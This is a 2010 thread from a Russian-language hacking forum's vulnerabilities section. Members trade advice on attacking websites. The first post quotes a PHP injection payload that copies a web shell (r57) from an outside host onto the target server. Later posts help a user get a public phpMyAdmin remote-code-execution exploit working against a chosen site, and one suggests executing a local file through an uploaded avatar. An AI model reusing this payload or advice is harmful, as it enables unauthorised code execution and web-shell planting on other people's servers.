HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.06.2010, 00:29
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от wkar  
Konqi хорошо написал, грузи через ?v=copy($_GET
,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php
© Grey
 
Ответить с цитированием

  #2  
Старый 27.06.2010, 00:30
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами: 8718197

Репутация: 11
По умолчанию

Цитата:
Сообщение от 547  
кстати
'' евал вроде в винде непашет так что систем юзать наверное надо...
пашет там все
 
Ответить с цитированием

  #3  
Старый 27.06.2010, 00:35
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

Цитата:
Сообщение от wkar  
пашет там все
незнаю у меня на локалхосте непашет

Parse error: syntax error, unexpected $end in C:\xampp\xampp\htdocs\cmd.php(1) : eval()'d code on line 1
 
Ответить с цитированием

  #4  
Старый 27.06.2010, 00:37
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Если ты пихаешь неверный код в эвал - это не значит, что в винде не работает.
 
Ответить с цитированием

  #5  
Старый 27.06.2010, 00:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от 547  
незнаю у меня на локалхосте непашет
Parse error: syntax error, unexpected $end in C:\xampp\xampp\htdocs\cmd.php(1) : eval()'d code on line 1
потому что ты кавычки тоже впихнул

я эт поставил для sql запроса )))
 
Ответить с цитированием

  #6  
Старый 27.06.2010, 00:41
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию

Цитата:
Сообщение от Konqi  
потому что ты кавычки тоже впихнул
я эт поставил для sql запроса )))
все работает,дело было не в кавычках,я синтаксис немного знаю...

Сообщение от wildshaman

Если ты пихаешь неверный код в эвал - это не значит, что в винде не работает.

да все дело былов этом
 
Ответить с цитированием

  #7  
Старый 27.06.2010, 00:57
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Запускаю вот этот эксплоит, но при запуске пишет:

Цитата:
Сообщение от None  
This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.
В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).

Что не так сделал?
 
Ответить с цитированием

  #8  
Старый 27.06.2010, 14:35
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от CyberHunter  
Запускаю вот
этот
эксплоит, но при запуске пишет:
В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).
Что не так сделал?
может просто залатили )
 
Ответить с цитированием

  #9  
Старый 27.06.2010, 16:27
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами: 10025299

Репутация: 412
По умолчанию

Цитата:
Сообщение от CyberHunter  
Запускаю вот
этот
эксплоит, но при запуске пишет:
В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).
Что не так сделал?
basic авторизация на пма стоит?
 
Ответить с цитированием

  #10  
Старый 27.06.2010, 17:09
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от CyberHunter  
Запускаю вот
этот
эксплоит, но при запуске пишет:
В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).
Что не так сделал?
версия пихипе какая? Если ниже 5 - не будет работать. Плюс могли и пропатчить, так сплойт - паблик. Но и для 4-ой версии есть вариант - исполнение локального файла, при знании асболютного пути и при возможности залить хотя бы аватарку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.